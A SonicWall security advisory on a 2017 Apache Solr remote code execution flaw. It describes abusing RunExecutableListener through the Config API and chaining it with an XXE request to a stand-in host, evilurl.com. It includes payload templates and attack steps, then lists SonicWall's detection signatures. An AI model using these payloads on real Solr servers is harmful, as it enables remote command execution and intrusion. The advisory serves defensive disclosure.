SonicWall Security Center
Share: Linkedin Share Facebook Like
Back to SonicALERT


Apache Solr Remote Code Execution Vulnerability (Nov 1, 2017)



Description


Apache Solr is an open source distributed search platform built on the Apache Lucene search engine library. A remote code execution vulnerability has been reported on Apache Solr before version 7.1, which allows an attacker to send certain crafted HTTP requests to execute artitrary commands on a remote server.

The code execution vulnerability

Solr uses the term "collection" to define a single search index, which is effectively a logical grouping of index data. Search queries are typically sent to Apache Solr by sending requests to the following URI:

http://<host>:8983/solr/<collection>/select?q=<query>

where <collection> is the collection name to perform the query on, and <query> is a query using any supported query syntax. Such request is sent via HTTP POST request, and will be handled by Apache Lucene parser.

Solr supports the use of event listeners which can be used to trigger actions based on various events sent to the collection (e.g. Update an collection). Event listeners require an event type as well as a handler class. Handler classes may be either a custom class or a built in class. Solr "RunExecutableListener" class can be used to execute arbitrary commands on specific events, for example after each update query. The problem is that such listener can be enabled with any parameters just by using Config API (http://<host>:8983/solr/<collection>/config) with add-listener command:

POST /solr/newcollection/config HTTP/1.1
Host: localhost:8983
Connection: close
Content-Type: application/json
Content-Length: 198

"add-listener" : {
"event":"postCommit",
"name":"somelistener",
"class":"solr.RunExecutableListener",
"exe":"[command]", <--- Arbitrary command
"dir":"solr/bin", <--- Command path
"args":["foo","bar"] <--- Command params
} }

When the postCommit event is triggered, the remote command will be executed on the privilege of the Solr server process.

The above mentioned vulnerability is sufficient for a local privilege escalation attack. To exploit this vulnerability without direct access to the Solr server, there is another vulnerability that can be exploited in a chained attack - The XML external entity expansion vulnerability.

The XML external entity expansion vulnerability

This vulnerability is caused by the lucene xml parser does not prohibit DOCTYPE declarations or the expansion of external entities. A query can be crafted that can cause Solr to make requests via localhost when it attempts to resolve an external entity, resulting in a server-side request forgery.

For example, when the request handled by the Apache Solr, a HTTP GET request to evilurl.com will be made.

http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://evilurl.com"'><a></a>'}

Combined with this vulnerability, the attacker could send local requests to the server, turning a local code execution vulnerability to a remote RCE vulnerability.

An exploit is already in the wild on exploit-db. A real world attack consists 3 parts:

  1. Create a new collection to prepare the URL for the local code execution, using the second vulnerability to call the localhost service URL. (If a collection name is known to the attacker, this step can be skipped)
  2. Trigger the code execution vulnerability, using the collection name created in step 1.
  3. http://localhost:8983/solr/<collection>/select?q=foo&qt=/solr/newcollection/config?stream.body=<JSON payload>&shards=localhost:8983/
  4. Update "newcollection" through XXE to trigger execution of RunExecutableListener. Using the same format of request from step 3.
  5. The malicious command contained in step 2's JSON payload will be executed.
SonicWall threat Research team has analyzed the vulnerability and developed the following signatures:
  • IPS 13036: Apache Solr Remote Code Execution 1
  • IPS 13037: Apache Solr Remote Code Execution 2



Back to top

Back to SonicALERT

Follow: Follow us on Facebook Follow us on Twitter Join the Conversation
#SonicWall
© 2017 SonicWall | Privacy Policy | Conditions for use | Feedback | Live Demo | SonicALERT | Document Library | Report Issues
Version: 13.6 | S2MSW02